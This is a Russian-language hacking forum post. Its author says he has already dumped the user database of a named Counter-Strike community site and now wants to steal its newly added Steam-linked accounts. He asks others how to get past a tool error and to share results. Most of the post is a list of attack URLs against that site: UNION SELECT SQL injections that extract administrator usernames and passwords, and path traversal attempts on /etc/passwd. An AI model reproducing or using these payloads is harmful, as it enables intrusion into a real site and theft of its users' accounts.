Есть сайт sonnih.net я уже однажды вылаживал их базу, но там сейчас прибавилось 100 акков, т.к. это ресурс КС там много кто сидит через стим ну и естественно можно украсть их. Нашел уйму якобы "уязвимостей", но через хавиж пишет, что название колонки из 63 символов и выдает квадраты. Как можно обойти такое, кроме залития шелла?
Может кому удастся раскрутить всё таки поделитесь тогда))
http://sonnih.net/index.php?option=com_ … ut=confirm
http://sonnih.net/index.php?option=com_ … T+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
http://sonnih.net/index.php?option=com_ … ect+concat(username,char(58),password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&Itemid=1
http://sonnih.net/index.php?option=com_ … mp;view=%' +'a'='a&id=25&Itemid=28
http://sonnih.net/index.php?option=com_ … ew=archive
http://sonnih.net/index.php?option=com_ … t;<>
http://sonnih.net/index.php?option=com_ … and+'1'='2
http://sonnih.net/index.php?option=com_ … 111,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),333+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
http://sonnih.net/index.php?option=com_ … ECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
http://sonnih.net/index.php?option=com_ … ECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
http://sonnih.net/index.php?option=com_ … 0,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5,6,7,8+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
http://sonnih.net/index.php?option=com_ … 5,6,concat (username,0x3a,password),8+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
http://sonnih.net/index.php?option=com_ … T+0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),0,0,0,0,0,1,1,1,1,2,3,4,5+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
http://sonnih.net/index.php?option=com_ … 2,3,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),5,6+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
http://sonnih.net/index.php?option=com_ … ECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
http://sonnih.net/index.php?option=com_ … T+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
http://sonnih.net/index.php?option=com_ … =1+and+1=2
http://sonnih.net/index.php?option=com_ … ull,concat(username,0x3e,password),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
http://sonnih.net/index.php?option=com_joomlaxplorer&action=show_error&dir=../../..//../../etc
http://sonnih.net/index.php?option=com_ … T+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5,6,7,8,9+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
http://sonnih.net/index.php?option=com_ … 0,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5,6,7,8+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
http://sonnih.net/index.php?option=com_ … 4,0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),5,0,0+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
http://sonnih.net/index.php?option=com_ … p;Itemid=1
http://sonnih.net/index.php?view=videos … p;user_id=
http://sonnih.net/index.php?option=com_ … t&bid=
http://sonnih.net/index.php?option=com_ … ,concat_ws(0x3a,username,password),3,4,5,6+from+jos_users--
http://sonnih.net/index.php?option=com_ … l&pid=
http://sonnih.net/index.php?option=com_ … get=/../..
http://sonnih.net/index.php?option=com_ … p;idea_id=
http://sonnih.net/index.php?option=com_ … oup_concat(username,0x3a,password),4,5+from+jos_users--
http://sonnih.net/index.php?option=com_agora&task=
http://sonnih.net/index.php?option=com_ … -148+UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users--
http://sonnih.net/index.php?option=com_ … ect+concat(username,char(58),password)+from+jos_users--&Itemid=54
http://sonnih.net/index.php?option=com_ … mp;gbid=-1 UNION ALL SELECT 1,2,NULL,4,NULL,6,7,NULL,9,CONCAT(username,0x3a,password),11,12,13,14,15,16 FROM jos_users
http://sonnih.net/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd
http://sonnih.net/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../etc/passwd
http://sonnih.net/index.php?option=com_ … etc/passwd
http://sonnih.net/index.php?option=com_mediqna&controller=../../../../../../../../../../../../../../../etc/passwd